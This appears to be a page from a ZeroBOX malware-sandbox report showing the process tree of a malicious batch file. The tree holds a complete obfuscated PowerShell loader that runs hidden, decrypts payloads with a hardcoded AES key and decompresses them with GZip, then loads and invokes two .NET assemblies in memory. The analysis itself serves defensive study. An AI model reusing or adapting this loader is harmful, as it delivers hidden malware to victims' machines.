popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "yqpZhMfpVnWUoZMx" C:\Users\test22\AppData\Local\Temp\csg20.bat

    1984

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\csg20.bat

      2056

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\csg20.bat

        2176

        • csg20.bat.exe "C:\Users\test22\AppData\Local\Temp\csg20.bat.exe" -w hidden -c $HFcG='ChiymTaniymTgeExiymTtiymTensiymTioiymTniymT'.Replace('iymT', '');$kZne='CriymTeaiymTtiymTeiymTDeiymTciymTryiymTpiymTtoriymT'.Replace('iymT', '');$wJxJ='LoaiymTdiymT'.Replace('iymT', '');$Oexa='EiymTleiymTmeiymTntAtiymT'.Replace('iymT', '');$lbLB='GetCiymTuriymTreiymTntiymTPriymTociymTesiymTsiymT'.Replace('iymT', '');$GsSc='InviymTokiymTeiymT'.Replace('iymT', '');$HGbl='MaiymTiniymTMiymToduiymTleiymT'.Replace('iymT', '');$GWSZ='SpliymTitiymT'.Replace('iymT', '');$IEJS='FriymTomiymTBasiymTe6iymT4iymTStiymTriymTiiymTniymTgiymT'.Replace('iymT', '');$nrTS='TraiymTnsfiymTormiymTFinaiymTlBiymTliymTockiymT'.Replace('iymT', '');$xXUT='EniymTtriymTyPiymToiymTintiymT'.Replace('iymT', '');$Qsdv='RiymTeiymTadiymTLiiymTnesiymT'.Replace('iymT', '');function MhzbT($oNysb){$xybXG=[System.Security.Cryptography.Aes]::Create();$xybXG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xybXG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xybXG.Key=[System.Convert]::$IEJS('LufX62Mv+Cer1v+T854+dPtxZMTOSHW0zoD0Zj9vqb0=');$xybXG.IV=[System.Convert]::$IEJS('EsMSWdwUmtQThdS0g+saOQ==');$EFTpm=$xybXG.$kZne();$GnwEL=$EFTpm.$nrTS($oNysb,0,$oNysb.Length);$EFTpm.Dispose();$xybXG.Dispose();$GnwEL;}function YIvVF($oNysb){$LlRjI=New-Object System.IO.MemoryStream(,$oNysb);$dIEdN=New-Object System.IO.MemoryStream;$Gmppr=New-Object System.IO.Compression.GZipStream($LlRjI,[IO.Compression.CompressionMode]::Decompress);$Gmppr.CopyTo($dIEdN);$Gmppr.Dispose();$LlRjI.Dispose();$dIEdN.Dispose();$dIEdN.ToArray();}$XzHjB=[System.Linq.Enumerable]::$Oexa([System.IO.File]::$Qsdv([System.IO.Path]::$HFcG([System.Diagnostics.Process]::$lbLB().$HGbl.FileName, $null)), 1);$AIBic=$XzHjB.Substring(2).$GWSZ(':');$JpVMA=YIvVF (MhzbT ([Convert]::$IEJS($AIBic[0])));$gQwXE=YIvVF (MhzbT ([Convert]::$IEJS($AIBic[1])));[System.Reflection.Assembly]::$wJxJ([byte[]]$gQwXE).$xXUT.$GsSc($null,$null);[System.Reflection.Assembly]::$wJxJ([byte[]]$JpVMA).$xXUT.$GsSc($null,$null);

          2284

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf